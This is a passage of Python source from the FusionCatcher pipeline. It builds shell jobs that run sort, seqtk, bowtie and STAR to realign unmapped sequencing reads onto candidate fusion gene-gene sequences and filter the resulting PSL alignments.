                            job.clean(outdir('reads-ids_clip_star_psl.fq.')+str(i),temp_path=temp_flag)
                            job.clean(outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),temp_path=temp_flag)
                            job.clean(gdb,temp_path=temp_flag)
                            job.clean(gda,temp_path=temp_flag)
                        else:
                            ##########################################################
                            # unmapped reads are mapped again, this time allowing a gap in their alignment
                            ##########################################################
                            # extract read ids
                            job.add('LC_ALL=C',kind='program')
                            job.add('awk',kind='parameter')
                            job.add("""'NR%4==1 {print substr($0,2,index($0,"__")-2)}'""",outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq'),kind='input')
                            job.add('|',kind='parameter')
                            job.add('LC_ALL=C',kind='parameter')
                            job.add('uniq',kind='parameter')
                            job.add('|',kind='parameter')
                            job.add('LC_ALL=C',kind='parameter')
                            job.add('sort',kind='parameter')
                            job.add('-u',kind='parameter')
                            if sort_buffer:
                                job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
                            if sort_parallel:
                                job.add('--parallel',options.processes,kind='parameter',checksum='no')
                            if sort_lzop_compress:
                                job.add('--compress-program','lzop',kind='parameter',checksum='no')
                            elif sort_gzip_compress:
                                job.add('--compress-program','gzip',kind='parameter',checksum='no')
                            job.add('-T',tmp_dir,kind='parameter',checksum='no')
                            # job.add('|',kind='parameter')
                            # job.add('LC_ALL=C',kind='parameter')
                            # job.add('uniq',kind='parameter')
                            job.add('|',kind='parameter')
                            job.add(_SK_+'seqtk',kind='parameter')
                            job.add('subseq',kind='parameter')
                            #job.add('',outdir('reads-ids_clip_star_psl.fq.')+str(i),kind='input',temp_path=temp_flag)
                            if options.trim_psl_3end_keep < max_len_reads and (not options.skip_extension):
job.add('',outdir('original_important.fq.gz'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'trim_poly_tails.py',kind='parameter') job.add('--input','-',kind='parameter') job.add('--repeats',length_anchor_minimum - 1,kind='parameter') # 12 job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'clip_quality.py',kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('-t',options.trim_quality,kind='parameter') # below Q5 trimming starts job.add('--score-type','sanger',kind='parameter') job.add('--input','-',kind='parameter') job.add('--output',outdir('reads-ids_clip_star_psl_unmapped_x.fq.')+str(i),kind='output') else: job.add('',outdir('reads-ids_clip_star_psl.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl_unmapped_x.fq.')+str(i),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl.fq.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_2.fq'),temp_path=temp_flag) job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_star_psl_unmapped_x.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('--list',outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('--output-1',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq.')+str(i),kind='output') job.add('--output-2',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq.')+str(i),kind='output') job.add('--wiggle-size',options.gap_wiggle_size,kind='parameter') job.add('--gap-size',options.length_gap,kind='parameter') job.add('--anchor-size',options.length_anchor_gap,kind='parameter') job.add('--anchor-size-max',options.length_anchor_gap_max,kind='parameter') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') if not options.skip_ig_star: job.add('--output-2-rc',kind='parameter') job.add('--replace-solexa-ids','=',kind='parameter') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) if options.skip_ig_star: job.clean(gda,temp_path=temp_flag) # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') #job.add('-v',options.mismatches,kind='parameter') job.add('-v',options.mismatches+1,kind='parameter') # 2 here is not enough for IGH!!!! job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(gdb,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--tryhard',kind='parameter') #????? 
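                            # NOTE: -k 500 with --best/--strata makes bowtie report up to 500
                            # alignments but only from the best stratum, which keeps the
                            # downstream PSL processing tractable for repetitive gene pairs.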
job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') job.add('--ff',kind='parameter') job.add('-X',maxlens[i],kind='parameter',from_file="yes") job.add('',gdb,kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq.')+str(i),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_star_unmapped.sam.')+str(i),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-unampped.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-unampped.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_star_unmapped.sam.')+str(i),kind='output') job.run() else: job.clean(gdb,temp_path=temp_flag) # job.add('du',kind='program') # job.add('-b',gda,kind='input') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',outdir('gene-gene2__nuc.txt.')+str(i),kind='output',dest_list='gg2nuc') # job.run() # get the length of the FASTA file job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-v','"^>"',kind='parameter') job.add('',gda,kind='input') job.add('|',kind='parameter') job.add('wc',kind='parameter') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add("'{print $3-$1}'",kind='parameter') job.add('>',outdir('gene-gene2__nuc.txt.')+str(i),kind='output',dest_list='gg2nuc') job.run() nucleotides2_gg = int(float(file(outdir('gene-gene2__nuc.txt.')+str(i),'r').readline().strip())) job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-c',kind='parameter') job.add("'^>'",gda,kind='input') job.add('>',outdir('gene-gene2__seq.txt.')+str(i),kind='output',dest_list='gg2seq') job.run(successful_exit_status=(0,1)) sequences2_gg = int(float(file(outdir('gene-gene2__seq.txt.')+str(i),'r').readline().strip())) genomesaindexnbases2 = int(min(14, math.log(nucleotides2_gg,2)/(float(2)) - 1)) genomechrbinnbits2 = int(min(18, math.log(float(nucleotides2_gg)/float(sequences2_gg),2))) # build the STAR index job.add(_SR_+'STAR',kind='program') job.add('--genomeChrBinNbits',genomechrbinnbits2,kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases2,kind='parameter') job.add('--runMode','genomeGenerate',kind='parameter') job.add('--runThreadN',options.processes,kind='parameter',checksum='no') if star25: job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x job.add('--genomeDir',outdir('gene-gene-bowtie_star2.'+str(i)+'/'),kind='output') job.add('--genomeFastaFiles',gda,kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-bowtie_star2_results.'+str(i)+'/'),kind='output',temp_path=temp_flag) job.run() # align the unmapped reads using STAR on candidate fusion gene-gene job.add(_SR_+'STAR',kind='program') job.add('--runRNGseed','54321',kind='parameter') #job.add('--twopass1readsN','-1',kind='parameter') #job.add('--twopassMode','Basic',kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases2,kind='parameter') job.add('--alignIntronMax',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 
'yes') job.add('--outFilterMatchNmin',length_anchor_star-1,kind='parameter')# 17 job.add('--outSAMattributes','NM',kind='parameter') # 'NM' ==> NM is different than nM job.add('--outFilterMatchNminOverLread','0.80',kind='parameter') job.add('--outFilterScoreMinOverLread','0.80',kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate','0.80',kind='parameter') # NEW in v0.99.4b job.add('--genomeDir',outdir('gene-gene-bowtie_star2.'+str(i)+'/'),kind='input',temp_path=temp_flag) job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--seedSearchStartLmax',length_anchor_star-1,kind='parameter')# default is: 50 if star25: job.add('--alignSJstitchMismatchNmax','5 -1 5 5',kind='parameter')# default is: 0 -1 0 0 # added in STAR 2.5.x job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter') job.add('--alignTranscriptsPerReadNmax','500000',kind='parameter') # if this is missing STAR crashes in some cases job.add('--scoreGap','-10000',kind='parameter') job.add('--alignEndsType','EndToEnd',kind='parameter') # disable soft clipping job.add('--readFilesIn',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-star-results-unmapped.'+str(i)+'/'),kind='output') job.run() job.link(outdir('gene-gene-star-results-unmapped.'+str(i),'Aligned.out.sam'),outdir('split_gene-gene_star_unmapped.sam.')+str(i),temp_path=temp_flag) job.add(_FC_+'merge-sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped.sam.')+str(i),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_unmapped_patch.sam.')+str(i),kind='output') #job.add('--mismatches-long',options.mismatches+1,kind='parameter') job.add('--mismatches-long',options.mismatches_gap,kind='parameter') job.add('--mismatches-short',options.mismatches,kind='parameter') if not options.skip_ig_star: job.add('--forward-reverse',kind='parameter') job.run() job.clean(outdir('gene-gene-star-results-unmapped.'+str(i)+'/'),temp_path=temp_flag) job.add(_FC_+'sam2psl.py',kind='program') if not options.skip_ig_star: job.add('--replace-read-ids','=',kind='parameter') job.add('--input',outdir('split_gene-gene_star_unmapped_patch.sam.')+str(i),kind='input',temp_path=temp_flag) #job.add('--output',outdir('split_gene-gene_star_unmapped_patch.psl.')+str(i),kind='output') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('split_gene-gene_star_unmapped_patch.psl.')+str(i),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped_patch.psl.')+str(i),kind='input',temp_path=temp_flag) 
job.add('--output',outdir('split_gene-gene_star_unmapped_final.psl.')+str(i),kind='output',dest_list='splitstarunmapped') job.add('--remove-extra',kind='parameter') job.run() # if job.iff(empty(outdir('split_gene-gene_star_final.psl.')+str(i)),id = "#split_gene-gene_star_final."+str(i)+"#"): job.link(outdir('gene-gene-star.psl.')+str(i), outdir('gene-gene-star_more.psl.')+str(i), temp_path=temp_flag, dest_list='genegenestar') job.clean(outdir('split_gene-gene_star_final.psl.')+str(i),temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('split_gene-gene_star_final.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-star.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-star_more.psl.')+str(i),kind='output',dest_list='genegenestar') job.run() #job.clean(outdir('gene-gene_split_star.fa'),temp_path=temp_flag) job.clean(outdir('reads_gene-gene_no-str_fixed.fq'),temp_path=temp_flag) job.clean(outdir('reads_gene-gene_no-str.fq'),temp_path=temp_flag if options.skip_bowtie2 else 'no') job.sink(job.genegenestar, outdir('gene-gene-star_more.psl.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('gene-gene-star_more.psl.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-star_more.psl'),kind='output') job.run() job.clean(job.genegenestar,temp_path=temp_flag) if hasattr(job,'splitstarunmapped'): job.sink(job.splitstarunmapped, outdir('split_gene-gene_star_unmapped_final.psl.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('split_gene-gene_star_unmapped_final.psl.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('split_gene-gene_star_unmapped_final.psl'),kind='output') job.run() job.clean(job.splitstarunmapped,temp_path=temp_flag) else: # build the STAR index job.add(_SR_+'STAR',kind='program') job.add('--genomeChrBinNbits',genomechrbinnbits,kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases,kind='parameter') job.add('--runMode','genomeGenerate',kind='parameter') job.add('--runThreadN',options.processes,kind='parameter',checksum='no') if star25: job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x job.add('--genomeDir',outdir('gene-gene-star/'),kind='output') job.add('--genomeFastaFiles',outdir('gene-gene.fa'),kind='input') job.add('--outFileNamePrefix',outdir('gene-gene-star-results/'),kind='output') job.run() # align the unmapped reads using STAR on candidate fusion gene-gene # t = "[from file: '%s']" % (outdir('gene-gene_longest.txt'),) # #if job.run(): # if os.path.exists(outdir('gene-gene_longest.txt')): # t = file(outdir('gene-gene_longest.txt'),'r').readline().strip() job.add(_SR_+'STAR',kind='program') job.add('--runRNGseed','54321',kind='parameter') #job.add('--twopass1readsN',outdir('log_counts_reads_gene-gene_no-str.txt'),kind='parameter',from_file='yes') job.add('--twopass1readsN','-1',kind='parameter') job.add('--twopassMode','Basic',kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases,kind='parameter') job.add('--sjdbOverhang',outdir('star_sdjboverhang.txt'),kind='parameter',from_file='yes') job.add('--alignIntronMax',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') if options.skip_star_bowtie: job.add('--outFilterMatchNmin',int(float(min_len_reads)*0.90),kind='parameter') job.add('--outFilterMatchNminOverLread','0.90',kind='parameter') job.add('--outFilterScoreMinOverLread','0.90',kind='parameter') # NEW in v0.99.4b 
job.add('--alignSplicedMateMapLminOverLmate','0.90',kind='parameter') # NEW in v0.99.4b else: perc = 0.40 if eporcrlf2igh: perc = float("%.4f" % ((float(length_anchor_minimum - 1) / float(min_len_reads)),)) job.add('--outFilterMatchNmin',int(float(min_len_reads)*perc),kind='parameter') job.add('--outFilterMatchNminOverLread',perc,kind='parameter') job.add('--outFilterScoreMinOverLread',perc,kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate',perc,kind='parameter') # NEW in v0.99.4b job.add('--genomeDir',outdir('gene-gene-star/'),kind='input',temp_path=temp_flag) job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--seedSearchStartLmax',length_anchor_star-1,kind='parameter')# default is: 50 job.add('--alignSJoverhangMin',length_anchor_star-1,kind='parameter') #9 # default is 5? # NEW in v0.99.4b if star25: job.add('--alignSJstitchMismatchNmax','5 -1 5 5',kind='parameter')# default is: 0 -1 0 0 # added in STAR 2.5.0a job.add('--outSJfilterOverhangMin','10 10 10 10',kind='parameter')# default is: 30 12 12 12 ("non-canonical motifs","GT/AG"motif,"GC/AG"motif,"AT/AC"motif) job.add('--outSJfilterCountUniqueMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterCountTotalMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterDistToOtherSJmin','0 0 0 0',kind='parameter')# default is: 10 0 5 10 #job.add('--outSJfilterIntronMaxVsReadN','%s %s %s' % (t,t,t),kind='parameter')# default is: 50000 100000 200000 job.add('--outSJfilterIntronMaxVsReadN',outdir('gene-gene_longest.txt'),kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',outdir('gene-gene_longest.txt'),kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',outdir('gene-gene_longest.txt'),kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter') job.add('--scoreGapNoncan','-4',kind='parameter') job.add('--scoreGapATAC','-4',kind='parameter') # job.add('--outFilterMultimapScoreRange','10',kind='parameter') # job.add('--outFilterMultimapNmax','10000',kind='parameter') # job.add('--chimScoreJunctionNonGTAG','0',kind='parameter') # job.add('--chimScoreDropMax','10000',kind='parameter')# default is: 0 # job.add('--chimScoreMin','0',kind='parameter')# default is: 0 # job.add('--chimScoreSeparation','10',kind='parameter')# default is: 0 # job.add('--chimSegmentMin',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') # job.add('--chimJunctionOverhangMin',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') if is_optparse_provided(parser,'limitSjdbInsertNsj'): job.add('--limitSjdbInsertNsj',options.limitSjdbInsertNsj,kind='parameter') if is_optparse_provided(parser,'limitOutSJcollapsed'): job.add('--limitOutSJcollapsed',options.limitOutSJcollapsed,kind='parameter') job.add('--readFilesIn',outdir('reads_gene-gene_no-str_fixed.fq'),kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-star-results/'),kind='output') job.run() # this works! 
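            # NOTE: the commented-out block below records, for reference, the standalone
            # STAR command line equivalent to the job assembled above.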
# # STAR \ # --alignIntronMax [ARGUMENT from file '/apps/fusioncatcher/output/snu16/gene-gene_longest.txt'] \ # --outFilterMatchNmin 30 \ # --outFilterMatchNminOverLread 0.90 \ # --genomeDir /apps/fusioncatcher/output/snu16/gene-gene-star/ \ # --runThreadN 4 \ # --seedSearchStartLmax 20 \ # --alignSJoverhangMin 9 \ # --outSJfilterOverhangMin 10 10 10 10 \ # --outSJfilterCountUniqueMin 1 1 1 1 \ # --outSJfilterCountTotalMin 1 1 1 1 \ # --outSJfilterDistToOtherSJmin 0 0 0 0 \ # --outSJfilterIntronMaxVsReadN [from file: '/apps/fusioncatcher/output/snu16/gene-gene_longest.txt'] [from file: '/apps/fusioncatcher/output/snu16/gene-gene_longest.txt'] [from file: '/apps/fusioncatcher/output/snu16/gene-gene_longest.txt'] \ # --readFilesIn /apps/fusioncatcher/output/snu16/reads_gene-gene_no-str_fixed.fq \ # --outFileNamePrefix /apps/fusioncatcher/output/snu16/gene-gene-star-results/ job.add('LC_ALL=C',kind='program') job.add('sed',kind='parameter') job.add("""'s/\-\([1-2]\\t\)/\/\\1/'""",outdir('gene-gene-star-results','Aligned.out.sam'),kind='input') job.add("",outdir('gene-gene-star-results/'),kind='input',temp_path=temp_flag,command_line='no') job.add('|',kind='parameter') job.add(_FC_+'sam2psl.py',kind='parameter') job.add('--input','-',kind='parameter') #job.add('--output',outdir('gene-gene-star.psl'),kind='output') #job.run() job.add('--output','-',kind='output') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('gene-gene-star.psl'),kind='output') job.run() if options.skip_star_bowtie: job.link(outdir('gene-gene-star.psl'), outdir('gene-gene-star_more.psl'), temp_path=temp_flag) job.clean(outdir('reads_gene-gene_no-str.fq'),temp_path=temp_flag if options.skip_bowtie2 else 'no') else: job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('gene-gene-star.psl'),kind='input') job.add('--output',outdir('gene-gene-star_final.psl'),kind='output',temp_path=temp_flag) job.add('--clipped-reads-ids',outdir('reads-ids_clip_psl_star.txt'),kind='output') job.add('--clipped-reads-refs',outdir('reads-refs_clip_psl_star.txt'),kind='output') job.add('--clip-min',length_anchor_star,kind='parameter') job.run() # job.add('sed',kind='program') # job.add("""'s/\-\([1-2]\\t\)/\/\\1/'""",outdir('gene-gene-star-results','Chimeric.out.sam'),kind='input') # job.add("",outdir('gene-gene-star-results/'),kind='input',temp_path=temp_flag,command_line='no') # job.add('|',kind='parameter') # job.add('sam2psl.py',kind='parameter') # job.add('--input','-',kind='parameter') # job.add('--output',outdir('gene-gene-star-chimeric.psl'),kind='output') # job.run() # # job.add('analyze_star_chimeric.py',kind='program') # job.add('--input',outdir('gene-gene-star-chimeric.psl'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('gene-gene-star-chimeric_final.psl'),kind='output') # job.run() # # # group reads which map on transcriptome in one 
FASTQ file # job.add('concatenate.py',kind='program') # job.add('',outdir('gene-gene-star.psl'),kind='input',temp_path=temp_flag) # job.add('',outdir('gene-gene-star-chimeric_final.psl'),kind='input',temp_path=temp_flag) # job.add('',outdir('gene-gene-star_all.psl'),kind='output') # job.run() if job.iff(empty(outdir('reads-ids_clip_psl_star.txt')),id = "#reads-ids-clip-psl-star#"): job.clean(outdir('reads-ids_clip_psl_star.txt'),temp_path=temp_flag) job.clean(outdir('reads-refs_clip_psl_star.txt'),temp_path=temp_flag) job.clean(outdir('reads_gene-gene_no-str.fq'),temp_path=temp_flag if options.skip_bowtie2 else 'no') else: job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-ids_clip_psl_star.txt'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl_uniq.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f1',outdir('reads-ids_clip_star_psl_uniq.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input',temp_path=temp_flag if options.skip_bowtie2 else 'no') #job.add('',outdir('original_important.fq.gz'),kind='input') job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl.fq'),kind='output') job.run() job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_star_psl.fq'),kind='input') job.add('--list',outdir('reads-ids_clip_star_psl_uniq.txt'),kind='input') job.add('--output-1',outdir('reads-ids_clip_star_psl_r1.fq'),kind='output') job.add('--output-2',outdir('reads-ids_clip_star_psl_r2.fq'),kind='output') job.add('--wiggle-size',options.rescue_wiggle_size,kind='parameter') job.add('--gap-size',options.rescue_gap_size,kind='parameter') job.add('--anchor-size',length_anchor_minimum,kind='parameter') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) job.add('LC_ALL=C',kind='program') 
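# next, deduplicate the clipped-read reference names; they decide which candidate gene-gene sequences are kept for the reduced bowtie index built below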
job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-refs_clip_psl_star.txt'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-refs_clip_star_psl_uniq.txt'),kind='output') job.run() # some pre-filtering of splitting reads (filter out the split reads which map on one gene) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-refs_clip_star_psl_uniq.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"|"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f',"1,2",kind='parameter') job.add('|',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') # unique job.add('|',kind='parameter') job.add('sed',kind='parameter') job.add("'1{/^$/d}'",kind='parameter') # delete the first line if it is empty (i.e. it contains only a newline) job.add('>',outdir('reads-refs_clip_star_psl_uniq_more.txt'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('gene-gene_unique.fa'),kind='input') job.add('',outdir('reads-refs_clip_star_psl_uniq_more.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-bowtie_star_unique.fa'),kind='output') job.run() job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('gene-gene-bowtie_star_unique.fa'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-bowtie_star_unique/'),kind='output',checksum='no') job.add('',outdir('gene-gene-bowtie_star_unique/'),kind='output',command_line='no') job.run() # map using bowtie # filter out reads not mapping ms = min(options.mismatches,2) if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input') job.add('',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input') else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input') job.add('',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'sliding-read.py',kind='parameter') job.add('--window','33',kind='parameter') job.add('--step','15',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o','-',kind='parameter') job.add('|',kind='parameter') job.add(_BE_+'bowtie',kind='parameter')
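# the stream assembled here is roughly (a sketch; actual values are resolved at runtime and the paths are illustrative):
#   fastqtk interleave r1.fq r2.fq - | sliding-read.py --window 33 --step 15 -i - -o - \
#     | bowtie -t -k 1 -v 2 --tryhard --suppress 2,3,4,5,6,7,8 gene-gene-bowtie_star_unique/ - \
#     | uniq | sort -u | awk '<keep only read ids whose a/b cuts both mapped>' > reads_filtered_unique_cuts_star.txt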
job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') # job.add('--trim5','10',kind='parameter') # job.add('--trim3','10',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_star_unique'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',outdir('gene-gene-bowtie_star_unique/'),kind='input') job.add('-',kind='parameter') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-temp.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: 